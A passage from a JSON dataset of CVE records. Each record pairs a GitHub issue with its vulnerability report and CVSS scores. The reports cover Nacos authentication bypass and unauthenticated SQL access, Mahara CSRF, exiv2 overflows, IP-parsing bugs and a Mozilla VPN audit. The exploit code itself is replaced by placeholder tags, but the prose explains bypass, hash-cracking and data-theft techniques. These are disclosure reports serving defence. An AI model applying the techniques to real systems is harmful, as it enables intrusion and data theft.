        "description": "Integer Overflow in num_images. Hello openjpeg2 team, I found an integer overflow vulnerability in the command line options. APITAG If there are many files in the imgdir directory, opj_ The number of files read by compress will overflow. openjpeg2(tested with revision master APITAG run commd APITAG asan info ERRORTAG APITAG When num_images is equal to NUMBERTAG multiplying with OPJ_PATH_LEN will produce an overflow result of NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-29349",
        "Issue_Url_old": "https://github.com/0xBaz/CVE-2021-29349/issues/1",
        "Issue_Url_new": "https://github.com/0xbaz/cve-2021-29349/issues/1",
        "Repo_new": "0xbaz/cve-2021-29349",
        "Issue_Created_At": "2021-03-31T20:04:33Z",
        "description": "CVETAG . Hi, Product : Mahara NUMBERTAG Website : FILETAG Login Details : APITAG Description : Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft the FILETAG directory, which leads to removing all messages from a mailbox. Video POC : Google Drive Video URLTAG POC : CODETAG Recommendations NUMBERTAG Implement X CSRF TOKEN and make sure it's validating in back end server as well NUMBERTAG Implement an interceptor which appends token value to every (state changing) request in custom request header APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-29441",
        "Issue_Url_old": "https://github.com/alibaba/nacos/issues/4701",
        "Issue_Url_new": "https://github.com/alibaba/nacos/issues/4701",
        "Repo_new": "alibaba/nacos",
        "Issue_Created_At": "2021-01-14T09:52:31Z",
        "description": "Report a security vulnerability in nacos to bypass authentication(identity) again. english Hello, I\u2019m threedr3am. I found that the latest version NUMBERTAG of nacos still has a bypass problem for the APITAG key value repair mechanism that bypasses security vulnerabilities in User Agent. The custom key value authentication of APITAG is enabled in nacos. Later, through the special url structure, it is still possible to bypass the restriction to access any http interface. By viewing this function, you need to add the configuration APITAG in APITAG to avoid the ERRORTAG POST URLTAG CODETAG APITAG APITAG APITAG public class APITAG implements Filter { MENTIONTAG private APITAG APITAG MENTIONTAG private APITAG APITAG MENTIONTAG private APITAG APITAG private APITAG extends APITAG APITAG APITAG = new APITAG MENTIONTAG public void APITAG request, APITAG response, APITAG chain) throws ERRORTAG ERRORTAG { if APITAG { APITAG response); return; } APITAG req = APITAG request; APITAG resp = APITAG response; if APITAG { String APITAG = APITAG if APITAG APITAG { APITAG response); return; } } else if APITAG && APITAG APITAG { String APITAG = APITAG if APITAG { APITAG response); return; } APITAG server identity value for {} from {}\", APITAG APITAG } else { ERRORTAG APITAG server identity key or value, Please make sure set APITAG \" + \" and APITAG , or open APITAG \"); return; } try { Method method = APITAG if (method == null) { APITAG response); return; } ...\u9274\u6743\u4ee3\u7801 } ... } ... } APITAG APITAG APITAG User Agent: Nacos Server CODETAG '' in APITAG the simple key value authentication mechanism is turned on Then, it will get a value from the http header according to the APITAG configured by the developer, and then go to the APITAG is matched, if it does not match, it will not enter the branch execution: APITAG But the problem is precisely here. The logic here should be to directly return denied access when there is a mismatch, but in fact we did not do this, which allows us to bypass the provision of conditions later. Looking further down, the code comes to: CODETAG As you can see, there is a judgment APITAG , as long as this condition is met, the subsequent authentication code will not go to. By looking at the APITAG code implementation, I found a method that can make the returned method null APITAG APITAG ERRORTAG ERRORTAG In this code, you can clearly see that the return of the method value depends on CODETAG The key of APITAG whether the mapping value can be obtained from APITAG of APITAG In the composition of APITAG there is a part of path, and there is a problem with the generation of this part. It is obtained in the following way: APITAG A normal visit, such as APITAG , the path obtained will be APITAG , and through a specially constructed URL, such as APITAG , the path will be APITAG In this way, the path will be able to control the trailing slash'/', resulting in the method cannot be obtained from the APITAG APITAG why? Because basically all APITAG in nacos do not end with a slash'/', only The APITAG at the end of the non slanted bar'/' exists and is stored in the APITAG of APITAG then the outermost APITAG condition will be satisfied, thus bypassing the authentication mechanism NUMBERTAG The scope of the vulnerability Sphere of influence NUMBERTAG loopholes reproduce NUMBERTAG Access user list interface APITAG As you can see, the authentication is bypassed and the user list data is returned CODETAG NUMBERTAG Add new user APITAG As you can see, authentication has been bypassed and new users have been added APITAG NUMBERTAG iew user list again APITAG As you can see, in the returned user list data, there is one more user we created by bypassing authentication. CODETAG NUMBERTAG isit the homepage APITAG , log in to the new account, and you can do anything \u4e2d\u6587 APITAG APITAG key APITAG APITAG APITAG APITAG \uff0c\u624d\u80fd\u907f\u514d APITAG \u7ed5\u8fc7\u9274\u6743\u7684\u5b89\u5168\u95ee\u9898\u3002 APITAG \u8c03\u7528\u6dfb\u52a0\u7528\u6237\u63a5\u53e3\uff0c\u6dfb\u52a0\u65b0\u7528\u6237\uff08 APITAG APITAG \u4e00\u3001\u6f0f\u6d1e\u8be6\u60c5 \u95ee\u9898\u4e3b\u8981\u51fa\u73b0\u5728 APITAG : ERRORTAG \u53ef\u4ee5\u770b\u5230\uff0c\u4e0a\u9762\u4e09\u4e2aif else\u5206\u652f\uff1a \u7b2c\u4e00\u4e2a\u662f APITAG APITAG Agent\u662f\u5426\u5339\u914d APITAG \uff0c\u82e5\u5339\u914d\uff0c\u5219\u8df3\u8fc7\u540e\u7eed\u6240\u6709\u903b\u8f91\uff0c\u6267\u884c APITAG \u7b2c\u4e8c\u4e2a\u662f APITAG \uff0c\u4e5f\u5c31\u662fnacos NUMBERTAG APITAG \u5b89\u5168\u95ee\u9898\u7684\u7b80\u5355\u4fee\u590d APITAG APITAG APITAG \uff0c\u5f00\u542f\u8be5key value\u7b80\u5355\u9274\u6743\u673a\u5236\u540e\uff0c\u4f1a\u6839\u636e\u5f00\u53d1\u8005\u914d\u7f6e\u7684 APITAG \u53bbhttp header\u4e2d\u83b7\u53d6\u4e00\u4e2avalue\uff0c\u53bb\u8ddf\u5f00\u53d1\u8005\u914d\u7f6e\u7684 APITAG \u8fdb\u884c\u5339\u914d\uff0c\u82e5\u4e0d\u5339\u914d\uff0c\u5219\u4e0d\u8fdb\u5165\u5206\u652f\u6267\u884c\uff1a APITAG APITAG \u518d\u5f80\u4e0b\u770b\uff0c\u4ee3\u7801\u6765\u5230\uff1a CODETAG \u53ef\u4ee5\u770b\u5230\uff0c\u8fd9\u91cc\u6709\u4e00\u4e2a\u5224\u65ad APITAG \uff0c\u53ea\u8981\u6ee1\u8db3\u8fd9\u4e2a\u6761\u4ef6\uff0c\u5c31\u4e0d\u4f1a\u8d70\u5230\u540e\u7eed\u7684\u9274\u6743\u4ee3\u7801\u3002 \u901a\u8fc7\u67e5\u770b APITAG APITAG APITAG APITAG ERRORTAG ERRORTAG APITAG CODETAG APITAG APITAG APITAG \u4e00\u4e2a\u6b63\u5e38\u7684\u8bbf\u95ee\uff0c\u6bd4\u5982 APITAG \uff0c\u5f97\u5230\u7684path\u5c06\u4f1a\u662f APITAG \uff0c\u800c\u901a\u8fc7\u7279\u6b8a\u6784\u9020\u7684url\uff0c\u6bd4\u5982 APITAG \uff0c\u5f97\u5230\u7684path\u5c06\u4f1a\u662f APITAG PATHTAG APITAG NUMBERTAG APITAG \u53ef\u4ee5\u770b\u5230\uff0c\u7ed5\u8fc7\u4e86\u9274\u6743\uff0c\u8fd4\u56de\u4e86\u7528\u6237\u5217\u8868\u6570\u636e CODETAG NUMBERTAG APITAG \u53ef\u4ee5\u770b\u5230\uff0c\u7ed5\u8fc7\u4e86\u9274\u6743\uff0c\u6dfb\u52a0\u4e86\u65b0\u7528\u6237 APITAG NUMBERTAG APITAG APITAG CODETAG NUMBERTAG APITAG \uff0c\u767b\u5f55\u65b0\u8d26\u53f7\uff0c\u53ef\u4ee5\u505a\u4efb\u4f55\u4e8b\u60c5 regards, threedr3am",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29442",
        "Issue_Url_old": "https://github.com/alibaba/nacos/issues/4463",
        "Issue_Url_new": "https://github.com/alibaba/nacos/issues/4463",
        "Repo_new": "alibaba/nacos",
        "Issue_Created_At": "2020-12-12T06:55:26Z",
        "description": "Report a security vulnerability in nacos to execute arbitrary SQL without authentication. \uff08english\uff09 Hello, I am threedr3am. I found a nacos interface. When nacos is deployed in the default configuration, it can be accessed without authentication and execute arbitrary SQL queries, which leads to the disclosure of sensitive information NUMBERTAG ulnerability details Source address: URLTAG The audit code can find that there is an interface in the config server, and the SQL statement can be executed without any authentication, and all data can be leaked The vulnerability lies in the module: APITAG in nacos config ERRORTAG As you can see, the code only limits the need to include select, so any select query statement can be executed Through the test, you can use the following statement to query all database information CODETAG The most important thing is that the interface does not require any authentication and can be accessed directly After reading the account number and the password after the hash, we can analyze it through the open source program source code because of the salt generation algorithm used when nacos creates the account. Look at the source code APITAG ERRORTAG As you can see, they are all default and users cannot modify them Therefore, refer to the tool class APITAG In this way, the password represented by the hash value can be quickly blasted locally CODETAG NUMBERTAG the loopholes reproduce Deployment process NUMBERTAG Go to github to download the latest release: URLTAG NUMBERTAG Execute PATHTAG m standalone to run locally poc\uff1a APITAG NUMBERTAG Scope of influence All versions \uff08\u4e2d\u6587\uff09 APITAG \u4e00\u3001\u6f0f\u6d1e\u8be6\u60c5 \u6e90\u7801\u5730\u5740\uff1a URLTAG \u5ba1\u8ba1\u4ee3\u7801\u53ef\u4ee5\u53d1\u73b0\uff0cconfig APITAG \u6f0f\u6d1e\u70b9\u5728\u4e8emodule\uff1anacos APITAG ERRORTAG APITAG \u901a\u8fc7\u6d4b\u8bd5\uff0c\u53ef\u4ee5\u7528\u4ee5\u4e0b\u7684\u8bed\u53e5\u67e5\u8be2\u5230\u6240\u6709\u6570\u636e\u5e93\u4fe1\u606f CODETAG \u6700\u91cd\u8981\u7684\u662f\uff0c\u8be5\u63a5\u53e3\u4e0d\u9700\u8981\u4efb\u4f55\u8ba4\u8bc1\uff0c\u76f4\u63a5\u5c31\u53ef\u4ee5\u8bbf\u95ee APITAG APITAG ERRORTAG \u53ef\u4ee5\u770b\u5230\uff0c\u90fd\u662f\u9ed8\u8ba4\u7684\uff0c\u4f7f\u7528\u8005\u6ca1\u6cd5\u505a\u4fee\u6539 APITAG \u901a\u8fc7\u8fd9\u6837\u7684\u65b9\u5f0f\uff0c\u53ef\u4ee5\u5728\u672c\u5730\u5feb\u901f\u7684\u7206\u7834\u51fahash\u503c\u8868\u793a\u7684\u5bc6\u7801 CODETAG NUMBERTAG github\u4e0b\u8f7d\u6700\u65b0\u7248release\uff1a URLTAG NUMBERTAG PATHTAG m standalone\u672c\u5730\u8fd0\u884c poc\uff1a APITAG \u4e09\u3001\u5f71\u54cd\u8303\u56f4 \u6240\u6709\u7248\u672c",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29457",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1529",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1529",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2021-04-08T03:01:08Z",
        "description": "heap buffer overflow write in APITAG VERSION exi NUMBERTAG URLTAG REPRODUCE Compile exi NUMBERTAG with asan: CODETAG Dowload testcases: URLTAG FILETAG exi NUMBERTAG in APITAG ERRORTAG Credit: Zhen Zhou of NSFOCUS Security Team",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-29458",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1530",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1530",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2021-04-08T07:27:55Z",
        "description": "heap buffer overflow Read in APITAG VERSION exi NUMBERTAG URLTAG REPRODUCE Compile exi NUMBERTAG with asan: CODETAG Dowload testcases: URLTAG FILETAG Run command: APITAG ERRORTAG Credit: Zhen Zhou of NSFOCUS Security Team",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-29476",
        "Issue_Url_old": "https://github.com/ambionics/phpggc/issues/52",
        "Issue_Url_new": "https://github.com/ambionics/phpggc/issues/52",
        "Repo_new": "ambionics/phpggc",
        "Issue_Created_At": "2019-04-29T20:14:43Z",
        "description": "Wrapper to bypass checks. There is a trick which can be used to bypass some attempts to validate the serialised data given: Put a APITAG before all integer values of Object and/or Classes (there might be also possible for integer and string, haven't checked). For instance: APITAG would become APITAG So far I am using a wrapper as this is a very specific situation to bypass the check in place: ERRORTAG However, it might be interesting to add it as an enhancement",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29482",
        "Issue_Url_old": "https://github.com/ulikunitz/xz/issues/35",
        "Issue_Url_new": "https://github.com/ulikunitz/xz/issues/35",
        "Repo_new": "ulikunitz/xz",
        "Issue_Created_At": "2020-08-18T20:54:07Z",
        "description": "[SECURITY] Implementation of APITAG vulnerable to CVETAG . Implementation of APITAG at URLTAG is very similar to the vulnerable code in the Golang APITAG library and seems to suffer from the same vulnerability described in URLTAG See the fix at FILETAG Note: I couldn't find any information on how to disclose this issue to the maintainers. I would also suggest setting up a Security Policy for the project within APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29486",
        "Issue_Url_old": "https://github.com/DrPaulBrewer/cumulative-distribution-function/issues/7",
        "Issue_Url_new": "https://github.com/drpaulbrewer/cumulative-distribution-function/issues/7",
        "Repo_new": "drpaulbrewer/cumulative-distribution-function",
        "Issue_Created_At": "2021-04-09T13:36:47Z",
        "description": "cdf never yields result for certain inpu. Hi, thanks you for providing this package. Given a specific data set we found that the function is stuck in a while loop. This can be reproduced reliably through the following example: ERRORTAG I hope you find this useful.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29499",
        "Issue_Url_old": "https://github.com/satori/go.uuid/issues/73",
        "Issue_Url_new": "https://github.com/satori/go.uuid/issues/73",
        "Repo_new": "satori/go.uuid",
        "Issue_Created_At": "2018-03-23T20:58:32Z",
        "description": "APITAG non random uuid. I'm running this on my macbook pro. I'm using APITAG to generate random identifiers. I'm generating theses identifiers at a _very_ low rate of a few dozen per days Here are some non random UUID that I got in the last weeks: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29922",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/83648",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/83648",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2021-03-29T16:13:38Z",
        "description": "APITAG Incorrect Parsing for Octal format IP string . This issue is inspired by this blog URLTAG . Due to the specification, leading zero in IP string is interpreted as octal literals. So a IP address APITAG actually means APITAG . As shown in the following example: APITAG However, the APITAG from the std library will recognize it as APITAG instead. A simple code to demo the situation ( playground link URLTAG : CODETAG I expected to see this happen: APITAG Instead, this happened: APITAG Noted this bug may cause security vulnerability in certain case. For example, a Rust program uses APITAG doing some sanity check then passing the user string to other library or program. Furthermore, the specification actually also allows hex format in IP string. Meta APITAG : APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29923",
        "Issue_Url_old": "https://github.com/golang/go/issues/43389",
        "Issue_Url_new": "https://github.com/golang/go/issues/43389",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2020-12-26T16:59:03Z",
        "description": "net: limit the size of APITAG input?. Maybe APITAG shouldn't successfully parse IP addresses out of unbounded inputs? e.g. APITAG passes, as does APITAG ( URLTAG Of course, in both those cases the data is already fully in memory, so most the harm has been done if this is attacker controlled. Still, a bit surprising. Intentional? Some parsers reject past NUMBERTAG digits, so APITAG is valid, but not more than NUMBERTAG bytes for an IP NUMBERTAG adddress.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29923",
        "Issue_Url_old": "https://github.com/golang/go/issues/30999",
        "Issue_Url_new": "https://github.com/golang/go/issues/30999",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2019-03-22T06:48:19Z",
        "description": "net/http: octal literals in IP addresses are interpreted as decimal ones. What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? Yes. What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOOS=\"linux\" PATHTAG GOPROXY=\"\" GORACE=\"\" PATHTAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" APITAG APITAG What did you do? APITAG What did you expect to see? APITAG is interpreted as APITAG . APITAG What did you see instead? The program tries to connect to APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/803",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/803",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:53:29Z",
        "description": "FVP NUMBERTAG WP5: Android app allows backups of application data. The APITAG property in the FILETAG file specifies if the data pertinent to the apps can be backed up NUMBERTAG Without setting the APITAG flag to false, the backup feature is enabled by default. In case an attacker is able to send adb commands to user phones, they could get access to all of the stored data from the protected data folders, inclusive of the VPN configuration data. Affected File: APITAG As this feature does not require a rooted phone, disallowing backups completely should be considered. Due to the fact that an absence of the flag will set it to true by default, it is recommended to explicitly set the APITAG flag to false within the application tag.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/805",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/805",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:55:02Z",
        "description": "FVP NUMBERTAG WP5: Android app supports insecure NUMBERTAG signature. The discovery was made that the provided Android staging and production builds are signed with an insecure NUMBERTAG APK signature. Using the insecure NUMBERTAG signature makes the app prone to the known Janus4 vulnerability on devices running Android NUMBERTAG The problem lets attackers smuggle malicious code into the APK without breaking the signature. At the time of writing, the app supports a minimum SDK of NUMBERTAG APITAG NUMBERTAG which only uses the NUMBERTAG signature and is, hence, vulnerable to this attack. The existence of this flaw means that attackers could trick users into installing a malicious attacker controlled APK which matches the NUMBERTAG APK signature of the Mozilla VPN Android application. As a result, a transparent update would be possible without warnings appearing in Android, effectively taking over the existing application and all of its data. It is recommended to increase the minimum supported SDK level to at least NUMBERTAG APITAG NUMBERTAG to ensure that this known vulnerability cannot be exploited on devices running older Android versions. In addition, the production builds should only be shipped with NUMBERTAG and NUMBERTAG APK signatures.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/804",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/804",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:54:19Z",
        "description": "FVP NUMBERTAG WP5: Secure flag missing on views for Android app. During the assessment of the Android app, the discovery was made that the FLAG_SECURE security flag is not deployed to protect views that display sensitive content. By applying the flag for Android views, the app\u2019s windows can no longer be manually \u201cscreenshotted\u201d. Additionally, the items would be excluded from automatic screenshots or screen recordings, which ultimately prevents screen data from leakage to alternative apps. Particularly for the implemented views displaying sensitive data, e.g. during the login process, adding this flag is important. An attacker would otherwise be able to steal sensitive data, such as login credentials or personal information, doing it after it has been displayed. Hence, this information could be stolen from the services via a malicious app.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/806",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/806",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:56:28Z",
        "description": "FVP NUMBERTAG API: Information disclosure via device endpoint. It was found that the corresponding API used by the Mozilla VPN applications includes sensitive information into response messages in case an error is triggered. The backend speaks to the Mullvad partner API which handles account related data for each Mozilla VPN user. However, if the Mullvad API throws an error, the backend includes this message in the response and returns it to the client. This might lead to an exposure of sensitive data, such as the corresponding Mullvad account ID, as shown below. Adversaries would be able to leverage this sort of information to perform further attacks against the connected APIs. ERRORTAG It is recommended not to route error messages received from the Mullvad partner API back to the client. Instead, a static error message or an error identifier should be employed to be able to monitor the application.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/809",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/809",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:58:23Z",
        "description": "FVP NUMBERTAG WP5: Android app exposes sensitive data to system logs. It was found that the Android app makes frequent use of logging features to be able to monitor events. However, this can be considered a bad practice, especially in production environments where tokens and codes of Mozilla VPN users might be accessible by third parties. In case the device is connected to the computer with debugging enabled via USB, an attacker may be able to get access to the logs via adb logcat. From there, extraction of user tokens may be achievable. Note that apps with system privileges are able to access logs directly on rooted devices.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/808",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/808",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:57:56Z",
        "description": "FVP NUMBERTAG WP5: Unencrypted shared preferences. During the assessment of the Android app, the discovery was made that the application does not always consistently use the encrypted shared preference feature provided by the Android SDK. This may lead to an information disclosure in case a local attacker is able to get root access to the phone or the data is obtainable via backups (see FVP NUMBERTAG Sensitive information stored within the shared_prefs data folder in plain text, such as user VPN IPs and private keys, could be revealed. It is advised to use the provided wrapper class called APITAG to encrypt sensitive data stored within the shared_prefs folder, so as to make the application more robust against the illustrated attacks. The wrapper class uses the Android Keystore for handling the master key and is used to encrypt/decrypt all other keysets. For more information, please refer to the official Android guide on storing data more securely. Additionally, it is also advised to store VPN configuration data via encrypted shared preferences, which is actually also written to the vpn.moz file in plain text.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/797",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/797",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:48:16Z",
        "description": "FVP NUMBERTAG WP1: Balrog does not verify certificate chain on APITAG It was found that Balrog does not verify the whole certificate chain on APITAG This allows attackers to supply a self signed leaf certificate, effectively indicating a bypass of Balrog. This could be abused by state funded attackers who are in charge of a trusted valid certificate authority. They could perform a Man in the Middle attack and replace the binary code provided by the Mozilla VPN update with malicious malware.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/799",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/799",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:49:46Z",
        "description": "FVP NUMBERTAG WP4: ATS policy unnecessarily weakened. The iOS Mozilla VPN app was checked for property settings which weaken the security of the application. It was discovered that APITAG is set. This means it disables the default App Transport Security restrictions and permits the app to utilize plain text HTTP requests. Affected File: APITAG Affected Code: APITAG As neither the source code nor the runtime assessment indicated that the iOS app actually requires plain text HTTP, it should be taken into consideration to remove this property. This would ensure that the default ATS restrictions are enforced.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/810",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/810",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:58:54Z",
        "description": "FVP NUMBERTAG General: Cross site APITAG hijacking. The provided staging build contains the Mozilla VPN APITAG Controller, which exposes a APITAG endpoint on localhost. No additional authentication is required to interact with this port, thus allowing any website to connect and interact with the VPN client. At the beginning of the audit, Mozilla assured that this APITAG server is only part of the staging build. However, later it was revealed that Mozilla would like to reuse this connection for communication with a browser extension in the future. Thus, Cure NUMBERTAG decided to report this issue. The following code can be hosted on an arbitrary website. When Mozilla VPN is running, the website will connect to the APITAG port and request a screenshot. This screenshot can then be leaked to the attacker.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/798",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/798",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:48:56Z",
